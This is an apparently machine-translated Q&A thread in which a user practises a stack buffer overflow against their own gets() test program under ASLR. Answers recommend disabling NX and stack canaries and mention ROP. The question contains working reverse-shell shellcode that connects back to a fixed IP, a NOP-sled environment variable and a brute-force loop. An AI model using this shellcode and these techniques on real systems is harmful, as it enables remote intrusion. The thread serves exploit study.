我一直试图在我的机器上强制执行ASLR,以便进行练习。首先,我确保ASLR已打开。
cat /proc/sys/kernel/randomize_va_space
1
我使用的机器是: -
bt ~ # uname -a
Linux bt 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686 pentium3 i386 GNU/Linux
我的程序很简单,如下所示。
bt ~ # cat t.c
#include<stdio.h>
int main(int argc, char **argv) {
char buffer[50];
gets(buffer);
return 0;
}
为了利用这一点,我创建了一个环境变量,如下所示。正如你所看到的,它有一个非常庞大的nop sled,带有反向shell的漏洞利用代码。
export EGG=`perl -e 'print "\x90"x64000 . "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xac\x10\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"'`
我使用以下C程序找出环境变量的地址:
int main(int argc, char **argv) {
printf("%p\n", getenv(argv[1]));
return 0;
}
我的地址为0xbfefadfd
。
我发现返回地址溢出需要76 bytes of something
+ 4 bytes of the return address
。所以,为了暴力,我做了: -
$ echo `perl -e 'print "A"x76 . "\xfd\xad\xef\xbf"'` > file
$ while true; do ./t < file; done
正如预期的那样,我得到了分段错误的日志,但是,即使在运行程序大约30分钟后,我也没有获得反向shell。我在这里做错了什么?
答案 0 :(得分:2)
您必须考虑一些事项。 1.您的shellcode必须与您的架构相匹配。 (这很容易测试)。 2.因为您将shellcode放在堆栈上,所以必须确保堆栈是可执行的。 实现此目的的一种方法是使用“-z execstack”-flag编译为gcc。
此外,可能还有其他方法可能会增加您找到正确地址的机会。
答案 1 :(得分:2)
可能是堆栈不可执行。您可以查看readelf
。如果GNU_STACK
部分未标记为可执行文件,则您的应用程序具有NX堆栈。
顺便说一句,在这种情况下,有一种更好的方法来击败ASLR。
你可以做的是返回.text部分,其地址由ASLR保持不变。 pop-ret,pop-pop-ret会弹出堆栈,直到你达到一些“可用”的值。可用的是高度情境化的。通常,你会寻找指向输入字符串,env vars等的指针。
此外,面向回归编程(ROP)现在是一个热门话题。看看吧。
答案 2 :(得分:1)
我不知道您正在尝试使用哪个平台,但除了ASLR之外,您的gcc很可能默认使用堆栈金丝雀/保护。使用-fno-stack-protector禁用此编译。